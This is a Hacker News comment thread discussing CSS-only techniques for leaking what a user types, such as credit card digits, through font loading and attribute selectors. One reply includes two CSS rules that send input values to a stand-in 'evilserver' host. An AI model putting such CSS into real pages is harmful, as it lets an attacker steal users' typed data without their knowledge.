Hacker News new | past | comments | ask | show | jobs | submit login

There’s an interesting technique to spy for key presses. Basically you have to use a custom font where each character loads from a different font URL. Browser will issue corresponding requests as you press your buttons. It won’t detect identical characters but it might steal enough to brute force the rest. And it works with no JS.



That’s what I thought this method was. Repeating characters would kill that method since you don’t know which character was repeated and, more importantly, where. Even in the best situation you have to guess 4 digits and their positions 1 through 16. That sounds like a lot of guessing.


Yes, not ideal. But may be someone might develop even better methods. Imagine something like

    input[value~="12"] { background-image: url(http://evilserver/12); }
    input[value~="13"] { background-image: url(http://evilserver/13); }
It's just a rough idea, but there are numerous methods to dynamically leak information through CSS.




Consider applying for YC's Summer 2025 batch! Applications are open till May 13

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: